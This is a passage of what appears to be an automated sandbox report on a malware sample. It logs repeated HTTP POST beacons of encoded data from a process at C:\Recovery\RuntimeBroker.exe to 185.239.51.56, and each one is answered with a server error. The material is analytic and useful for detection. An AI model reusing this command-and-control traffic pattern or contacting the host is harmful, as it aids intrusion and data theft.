                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  36192.168.2.449777185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:39.933752060 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:40.284571886 CET2504OUTData Raw: 53 5a 5e 55 5a 5c 5e 51 5f 5a 5a 53 57 5d 56 5e 5f 58 5d 45 51 50 57 59 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: SZ^UZ\^Q_ZZSW]V^_X]EQPWY^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$??6["1,10;=%<\+5^5&17;0$;'&Q>^-"^%#[.6
                                                                                                  Jan 1, 2025 02:27:40.635924101 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:40.643277884 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:40 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  37192.168.2.449778185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:40.769181967 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:41.128365993 CET2504OUTData Raw: 53 5d 5b 54 5a 5c 5e 51 5f 5a 5a 53 57 5f 56 57 5f 58 5d 48 51 5c 57 59 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: S][TZ\^Q_ZZSW_VW_X]HQ\WY^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['A)<"Z!0&38-*[(7%+(6"&_ ;/3;&'.9-"^%#[.>
                                                                                                  Jan 1, 2025 02:27:41.470607042 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:41.608418941 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:41 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  38192.168.2.449779185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:41.740324974 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:42.097157955 CET2504OUTData Raw: 56 5f 5e 56 5f 58 5b 5c 5f 5a 5a 53 57 5e 56 57 5f 5a 5d 47 51 50 57 51 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V_^V_X[\_ZZSW^VW_Z]GQPWQ^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$(<&^!0&?/>6Y+*Y+^)Y5>Y $]4^1'.,-"^%#[.
                                                                                                  Jan 1, 2025 02:27:42.443439960 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:42.450582981 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:42 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  39192.168.2.449780185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:42.585196018 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  40192.168.2.449781185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:42.821671009 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 1600
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:43.175127029 CET1600OUTData Raw: 56 52 5b 55 5a 57 5e 51 5f 5a 5a 53 57 51 56 51 5f 5c 5d 41 51 5d 57 5c 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: VR[UZW^Q_ZZSWQVQ_\]AQ]W\^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$(,-"" Y2(],=1?B&_((5%-77%8#&4:-"^%#[.
                                                                                                  Jan 1, 2025 02:27:43.542999983 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:43.552165031 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:43 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  41192.168.2.449782185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:42.943510056 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:43.300144911 CET2504OUTData Raw: 53 58 5e 50 5a 5d 5b 5d 5f 5a 5a 53 57 50 56 56 5f 54 5d 42 51 5d 57 51 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: SX^PZ][]_ZZSWPVV_T]BQ]WQ^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$)/>6"13#--1+B&Y*;)#5!"8?U33%.-"^%#[.
                                                                                                  Jan 1, 2025 02:27:43.659171104 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:43.796356916 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:43 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  42192.168.2.449783185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:43.930243969 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:44.285974026 CET2504OUTData Raw: 53 5f 5b 54 5a 5d 5e 57 5f 5a 5a 53 57 5a 56 51 5f 5d 5d 40 51 57 57 5a 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: S_[TZ]^W_ZZSWZVQ_]]@QWWZ^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['+-"1#&3,-&X=7-?8>"2[4?U$+(1&],="^%#[.*
                                                                                                  Jan 1, 2025 02:27:44.635761976 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:44.660489082 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:44 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  43192.168.2.449784185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:44.802257061 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:45.159514904 CET2504OUTData Raw: 56 5a 5e 52 5f 58 5b 54 5f 5a 5a 53 57 5b 56 5e 5f 5e 5d 47 51 55 57 5d 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: VZ^R_X[T_ZZSW[V^_^]GQUW]^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['E+?6!'&U+-=.\<7.X+;%_"&2_"(Q3'%$"_,-"^%#[..
                                                                                                  Jan 1, 2025 02:27:45.526875019 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:45.535043001 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:45 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  44192.168.2.449785185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:45.661967993 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2500
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:46.018868923 CET2500OUTData Raw: 53 5e 5e 5e 5f 5b 5e 56 5f 5a 5a 53 57 59 56 55 5f 5e 5d 43 51 55 57 5d 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: S^^^_[^V_ZZSWYVU_^]CQUW]^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$(&"/1 ]/>9<79<6%#,'842%-"^%#[.*
                                                                                                  Jan 1, 2025 02:27:46.371860981 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:46.380918026 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:46 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  45192.168.2.449786185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:46.502785921 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:46.847006083 CET2504OUTData Raw: 53 5e 5b 55 5f 58 5b 50 5f 5a 5a 53 57 58 56 55 5f 5e 5d 46 51 50 57 5d 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: S^[U_X[P_ZZSWXVU_^]FQPW]^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$</!5T;%U',-2X+((=!!"(3$;0\17._:"^%#[."
                                                                                                  Jan 1, 2025 02:27:47.207947969 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:47.217161894 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:47 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  46192.168.2.449787185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:47.348088980 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2500
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:47.728812933 CET2500OUTData Raw: 56 5e 5e 53 5f 58 5b 53 5f 5a 5a 53 57 59 56 5e 5f 54 5d 40 51 55 57 5d 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V^^S_X[S_ZZSWYV^_T]@QUW]^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['?*[510[&',(:_+(!#%"X7(Q$(#&'!-"^%#[.
                                                                                                  Jan 1, 2025 02:27:48.056498051 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:48.064070940 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:47 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  47192.168.2.449788185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:48.219484091 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:48.565774918 CET2504OUTData Raw: 53 59 5b 54 5a 59 5b 5c 5f 5a 5a 53 57 5c 56 57 5f 5e 5d 45 51 54 57 59 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: SY[TZY[\_ZZSW\VW_^]EQTWY^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['E)/5"2,\2##,[&<$:*8#%4'U3\1$1-"^%#[.2


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  48192.168.2.449789185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:48.571702003 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 1600
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:48.925146103 CET1600OUTData Raw: 53 5f 5e 57 5f 5f 5b 55 5f 5a 5a 53 57 5c 56 57 5f 5f 5d 45 51 50 57 51 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: S_^W__[U_ZZSW\VW__]EQPWQ^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['(?2X""% 8Z,-.Z(71?(*#5-#/Q38 %9-"^%#[.2
                                                                                                  Jan 1, 2025 02:27:49.272506952 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:49.280401945 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:49 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  49192.168.2.449790185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:48.693653107 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:49.050132036 CET2504OUTData Raw: 56 5e 5b 54 5a 5c 5b 5c 5f 5a 5a 53 57 50 56 5f 5f 5e 5d 41 51 50 57 5a 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V^[TZ\[\_ZZSWPV__^]AQPWZ^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['D+,"Z",&#X;=*Z+9<*"5 8$17."^%#[.
                                                                                                  Jan 1, 2025 02:27:49.413506031 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:49.421489954 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:49 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  50192.168.2.449791185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:49.552170992 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:49.909552097 CET2504OUTData Raw: 53 58 5e 5f 5a 5d 5b 57 5f 5a 5a 53 57 58 56 55 5f 58 5d 40 51 54 57 59 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: SX^_Z][W_ZZSWXVU_X]@QTWY^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['@+Z"_!101U Y/5<41*85) ;?V%(<_1'*\:="^%#[."
                                                                                                  Jan 1, 2025 02:27:50.253700018 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:50.260987043 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:50 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  51192.168.2.449792185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:50.399451971 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
